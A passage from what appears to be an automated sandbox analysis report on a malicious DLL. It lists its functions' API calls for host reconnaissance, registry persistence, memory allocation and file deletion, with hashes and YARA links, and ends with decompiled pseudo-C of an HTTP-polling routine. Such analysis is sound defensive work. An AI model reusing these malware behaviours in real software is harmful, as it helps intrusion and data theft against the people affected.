                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • wsprintfA.USER32 ref: 0580B202
                                            • wsprintfA.USER32 ref: 0580B237
                                            • memcpy.NTDLL(00000000,?,?), ref: 0580B244
                                            • memcpy.NTDLL(00000008,058243E8,00000002,00000000,?,?), ref: 0580B259
                                            • wsprintfA.USER32 ref: 0580B27C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                            • String ID:
                                            • API String ID: 2937943280-0
                                            • Opcode ID: 1318eb4ff15344f80aa0a34261e7cc0a590fb12388465630b59c62a15043b07a
                                            • Instruction ID: 601602c844192962e6a8176f89f765d291289e834bed506154ce7efd46104026
                                            • Opcode Fuzzy Hash: 1318eb4ff15344f80aa0a34261e7cc0a590fb12388465630b59c62a15043b07a
                                            • Instruction Fuzzy Hash: 1E414B71A00209AFDB14DF99DC88EAEBBFCEF48209B108055FD19D3250EA31EE05CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581FFA5 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0581FFCF
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581FFE2
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0581FFF4
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,05806BDA), ref: 05820018
                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 05820026
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0582003D
                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 0582004E
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05806BDA), ref: 05820074
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapName$AllocateComputerFreeUser
                                            • String ID:
                                            • API String ID: 3239747167-0
                                            • Opcode ID: 4c66fcd0e111f0020880f9b9f7472f6e3930b31797eefe9803895ef806556a70
                                            • Instruction ID: 3279fc4978d1ff523590bf66b8cb39d95cf8ce92042e87d58aa5da11ded2646b
                                            • Opcode Fuzzy Hash: 4c66fcd0e111f0020880f9b9f7472f6e3930b31797eefe9803895ef806556a70
                                            • Instruction Fuzzy Hash: E931CDB6A10209EFDB10DFB5DD898AEBFF9FB44210B148469FD06D3210EB34AD859B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05816378 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?), ref: 0581639C
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058163AE
                                            • wcstombs.NTDLL ref: 058163BC
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?), ref: 058163E0
                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 058163F5
                                            • mbstowcs.NTDLL ref: 05816402
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 05816414
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 0581642E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                            • String ID:
                                            • API String ID: 316328430-0
                                            • Opcode ID: fab88e454f1392000edd195c7c54b67e1ae1bbe34b9bbc789cc8d05be06d3c77
                                            • Instruction ID: b4ed5c809406d5252e3a015357c17cce8ec06c77062ec7140b1b0be26b89833c
                                            • Opcode Fuzzy Hash: fab88e454f1392000edd195c7c54b67e1ae1bbe34b9bbc789cc8d05be06d3c77
                                            • Instruction Fuzzy Hash: 93213D31510209FBDF219FA5EC49E9A7F79FB44315F108026FE06A2060EB71A9A4DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807574 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(0581C387,00000000,00000000,05829460,?,?,05811B32,0581C387,00000000,0581C387,05829440), ref: 05807587
                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05807595
                                            • wsprintfA.USER32 ref: 058075B1
                                            • RegCreateKeyA.ADVAPI32(80000001,05829440,00000000), ref: 058075C9
                                            • lstrlen.KERNEL32(?), ref: 058075D8
                                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 058075E6
                                            • RegCloseKey.ADVAPI32(?), ref: 058075F1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05807600
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                            • String ID:
                                            • API String ID: 1575615994-0
                                            • Opcode ID: b363ddfa91abbe012bfd585ab4fbc44dd526efe35899621d06062ea8caeff823
                                            • Instruction ID: 830f6f0bf3385aca805181d2413badbe07e74123cdc93ec4f1d734cc5273f9af
                                            • Opcode Fuzzy Hash: b363ddfa91abbe012bfd585ab4fbc44dd526efe35899621d06062ea8caeff823
                                            • Instruction Fuzzy Hash: A8111B72110208BFEF215B95EC8AEAA3F7DEB48724F108025FE05D6160DA72AD959B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581CDA3 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0581CDAF
                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0581CDCD
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0581CDD5
                                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0581CDF3
                                            • GetLastError.KERNEL32 ref: 0581CE07
                                            • RegCloseKey.ADVAPI32(?), ref: 0581CE12
                                            • CloseHandle.KERNEL32(00000000), ref: 0581CE19
                                            • GetLastError.KERNEL32 ref: 0581CE21
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                            • String ID:
                                            • API String ID: 3822162776-0
                                            • Opcode ID: 3420a96aa0af44e72f97df1df50eb0d4f2d29ac9d5efd97a878154ef41d1b094
                                            • Instruction ID: e68366ff8199262bbfe8d90e48dff54e8642c57bdc9b7e4a9448935bfdbe0a60
                                            • Opcode Fuzzy Hash: 3420a96aa0af44e72f97df1df50eb0d4f2d29ac9d5efd97a878154ef41d1b094
                                            • Instruction Fuzzy Hash: CE113C76190248BBEB219FA1D849E6A3FADFB44265F008014FE16C5250DF31DD64CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581814E Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 8a1a3200f64cbf1f6661d54b7c592a23b2982ee01e8bdea36e94e61fdfd29f6b
                                            • Instruction ID: cfd795b0dc0713ecf6fc6c17bb10695dd75a13a2bdf855d2bdef913d6bd9eb24
                                            • Opcode Fuzzy Hash: 8a1a3200f64cbf1f6661d54b7c592a23b2982ee01e8bdea36e94e61fdfd29f6b
                                            • Instruction Fuzzy Hash: E2B1F071900219EFDF22AB95CC09AAEBBB9BF05314F048065ED11B7160D731AE85DF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05814ACA Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCommandLineA.KERNEL32(058250F8,00000038,0581600B,00000000,76CDF5B0,0581339A,?,00000001,?,?,?,?,?,?,?,0580BF69), ref: 05814ADB
                                            • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05814AEC
                                              • Part of subcall function 05803997: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0581780A,?), ref: 058039A0
                                              • Part of subcall function 05803997: memcpy.NTDLL(00000000,?,00000000,?), ref: 058039C3
                                              • Part of subcall function 05803997: memset.NTDLL ref: 058039D2
                                            • ExitProcess.KERNEL32 ref: 05814CCE
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,765BD3B0,05D7C304,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 058152E8
                                              • Part of subcall function 058152C3: StrTrimA.SHLWAPI(?,05824FC4,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 05815307
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,?,0580CE0C,?,00000020,05D7C304), ref: 05815313
                                            • lstrcmp.KERNEL32(?,?), ref: 05814B5A
                                            • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,0580BF69,?), ref: 05814B72
                                              • Part of subcall function 05819287: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,05D7B7F0,?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000), ref: 058192C7
                                              • Part of subcall function 05819287: CloseHandle.KERNEL32(000000FF,?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000,?), ref: 058192D2
                                            • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,0580BF69,?), ref: 05814BE4
                                            • lstrcmp.KERNEL32(?,?), ref: 05814BFD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 739714153-0
                                            • Opcode ID: 0f94e1e52549bfc9f57ad6b33989fe1f5101bf2e881d5322e66aeb65cc37aa50
                                            • Instruction ID: a2907718aacdfcc1fee68e7a4a438e5ebf29e9d75734f8fa53e363c74146940a
                                            • Opcode Fuzzy Hash: 0f94e1e52549bfc9f57ad6b33989fe1f5101bf2e881d5322e66aeb65cc37aa50
                                            • Instruction Fuzzy Hash: EF514971A10219AFDF20ABA4CC49EAEBFBDBF08705F044525FD01E61A0DB35AD45CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05804687 Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 058046B2
                                            • StrTrimA.SHLWAPI(00000000,?), ref: 058046CF
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05804702
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 0580472B
                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 058047F0
                                              • Part of subcall function 05803997: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0581780A,?), ref: 058039A0
                                              • Part of subcall function 05803997: memcpy.NTDLL(00000000,?,00000000,?), ref: 058039C3
                                              • Part of subcall function 05803997: memset.NTDLL ref: 058039D2
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 058047A1
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 058047D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                            • String ID:
                                            • API String ID: 239510280-0
                                            • Opcode ID: 934755fcb30068f87f163c34b5e92d9afe74d50417073d61a633da3fc0e02b88
                                            • Instruction ID: 80fc7301836c60c8c4ee00b79daac2f5b42e2fc3e00c15b9bddb48e92c1351f2
                                            • Opcode Fuzzy Hash: 934755fcb30068f87f163c34b5e92d9afe74d50417073d61a633da3fc0e02b88
                                            • Instruction Fuzzy Hash: 6741C031250209BBEF629AA8DC89FBE3EB9EB45750F104025FE06E61E0DF719D808B55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B4CF Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B529
                                            • lstrlen.KERNEL32(?,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B547
                                            • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0581B573
                                            • memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B58A
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0581B59D
                                            • memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B5AC
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?), ref: 0581B610
                                              • Part of subcall function 05801924: RtlLeaveCriticalSection.NTDLL(?), ref: 058019A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                            • String ID:
                                            • API String ID: 1635816815-0
                                            • Opcode ID: 8375a0b15e52af6083a9f569cc00b59c950e9fb1ac900334d8c40dcd3098d237
                                            • Instruction ID: d10d575b10e63868faa427ad29114d9d233630013c629b48029769c00efcb901
                                            • Opcode Fuzzy Hash: 8375a0b15e52af6083a9f569cc00b59c950e9fb1ac900334d8c40dcd3098d237
                                            • Instruction Fuzzy Hash: CD415E31600218ABDF219FA8DC88AEEBFA9FF04351F018565FD06E7160DB709E90DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580EF43 Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 0580EF84
                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0580EFB2
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0580EFF7
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0580F01F
                                            • _strupr.NTDLL ref: 0580F04A
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0580F057
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0580F071
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                            • String ID:
                                            • API String ID: 3831658075-0
                                            • Opcode ID: a1f0303710ad42d3ce23aad7b96303850f1bf5c0f3ba19b6d86fe51ad140a4cb
                                            • Instruction ID: cb8b487923e33f8536da752afb76004d68271e4ba68b07caf990f1d10e403f05
                                            • Opcode Fuzzy Hash: a1f0303710ad42d3ce23aad7b96303850f1bf5c0f3ba19b6d86fe51ad140a4cb
                                            • Instruction Fuzzy Hash: 8F410671904218AFDF719BA4CC49BEEBFB9BF48701F148456EA02E2190DB749A84DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05814F64 Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlImageNtHeader.NTDLL ref: 05814F8D
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 05814FD0
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05814FEB
                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 05815041
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 0581509D
                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 058150AB
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 058150B6
                                              • Part of subcall function 05802F6E: RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 05802F82
                                              • Part of subcall function 05802F6E: memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FAB
                                              • Part of subcall function 05802F6E: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 05802FD4
                                              • Part of subcall function 05802F6E: RegCloseKey.ADVAPI32(-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FFF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                            • String ID:
                                            • API String ID: 3181710096-0
                                            • Opcode ID: 2cd1f515f63d77c50cfed68abfd3865903a67c50c1cdfffbbeab566e0d28250d
                                            • Instruction ID: 6c409873daa773a12002a2a463845e0a147f2f3ba556e04204b3cffb1438ebe4
                                            • Opcode Fuzzy Hash: 2cd1f515f63d77c50cfed68abfd3865903a67c50c1cdfffbbeab566e0d28250d
                                            • Instruction Fuzzy Hash: 80417C72210205ABEF319EA5D88AF6A3FADFB80751F048024FD06D6150DB71ED85CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807E45 Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedIncrement.KERNEL32(0582908C), ref: 05807E57
                                            • lstrcpy.KERNEL32(00000000), ref: 05807E93
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • GetLastError.KERNEL32(00000000), ref: 05807F22
                                            • HeapFree.KERNEL32(00000000,?), ref: 05807F39
                                            • InterlockedDecrement.KERNEL32(0582908C), ref: 05807F50
                                            • DeleteFileA.KERNEL32(00000000), ref: 05807F71
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05807F81
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                            • String ID:
                                            • API String ID: 908044853-0
                                            • Opcode ID: 4059644207bfe74917fd405bbaf39e95fd563ce8ec8d6d48f5c4dfebc601e235
                                            • Instruction ID: 485f1c0c710050b2021bb9dd66393ce3cad8d94e5c1dd5d18611a574c55c1053
                                            • Opcode Fuzzy Hash: 4059644207bfe74917fd405bbaf39e95fd563ce8ec8d6d48f5c4dfebc601e235
                                            • Instruction Fuzzy Hash: 4B312732A00218FBCF609FA4DC48AAD7EB5EF04750F119064FD05E7180DB30AE82CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058041F7 Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0580423D
                                            • StrTrimA.SHLWAPI(?,?), ref: 0580425B
                                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 058042C4
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 058042E5
                                            • DeleteFileA.KERNEL32(?,00003219), ref: 05804307
                                            • HeapFree.KERNEL32(00000000,?), ref: 05804316
                                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 0580432E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 1078934163-0
                                            • Opcode ID: bb32e65cf1cc29e42bc0200b43cfec6eebece58ec50f846e8e118b43e0e52e47
                                            • Instruction ID: b61ca97135eb2a9f0192c5115caa14545e19937c3e03b7ce0cef1911007dc12c
                                            • Opcode Fuzzy Hash: bb32e65cf1cc29e42bc0200b43cfec6eebece58ec50f846e8e118b43e0e52e47
                                            • Instruction Fuzzy Hash: 6231DF32244205AFEA20EB95DC05FAA7FE8FF58710F054415FE40D71A0DB65ED458BA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05810148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,0581043C,00000000), ref: 05810162
                                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05810177
                                            • memset.NTDLL ref: 05810184
                                            • HeapFree.KERNEL32(00000000,00000000,?,0581043B,?,?,00000000,?,00000000,05817364,?,00000000), ref: 058101A1
                                            • memcpy.NTDLL(?,?,0581043B,?,0581043B,?,?,00000000,?,00000000,05817364,?,00000000), ref: 058101C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Allocate$Freememcpymemset
                                            • String ID: chun
                                            • API String ID: 2362494589-3058818181
                                            • Opcode ID: 94b7d14d72e19b264be23349b10aee78458f400a798fea02e8848b57495c5e37
                                            • Instruction ID: a0d898ba848bdde6d0d7571f7f24406e2939a2ec0f18d5d771bfa9a14da5f70a
                                            • Opcode Fuzzy Hash: 94b7d14d72e19b264be23349b10aee78458f400a798fea02e8848b57495c5e37
                                            • Instruction Fuzzy Hash: 6B314771200706EFEB319B65DC48A66BBEDAF14310F00842AED4ACB260DB70F985CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5F21 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F5F21(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E049F4DF6(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E049F4C73(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E049F3A6F( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                            0x049f5f21
                                            0x049f5f21
                                            0x049f5f31
                                            0x049f5f34
                                            0x049f5f38
                                            0x049f5f3e
                                            0x049f5f43
                                            0x049f5f5c
                                            0x049f5f70
                                            0x049f5f77
                                            0x049f5f7e
                                            0x049f5fd1
                                            0x049f5fd7
                                            0x049f5fdd
                                            0x049f6018
                                            0x049f601e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f5fdd
                                            0x049f5f84
                                            0x00000000
                                            0x049f5f8b
                                            0x049f5f99
                                            0x049f5f9c
                                            0x049f5f9f
                                            0x049f5fab
                                            0x049f5faf
                                            0x049f6011
                                            0x049f5fb1
                                            0x049f5fc3
                                            0x049f6001
                                            0x049f600c
                                            0x049f5fc5
                                            0x049f5fc8
                                            0x049f5fcc
                                            0x049f5fcc
                                            0x049f5fc3
                                            0x00000000
                                            0x049f5faf
                                            0x049f5f84
                                            0x049f5f48
                                            0x049f5f4e
                                            0x049f5f51
                                            0x049f5f56
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f5fe6
                                            0x049f5fee
                                            0x049f5ff3
                                            0x049f5ff6
                                            0x00000000

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76CC81D0), ref: 049F5F38
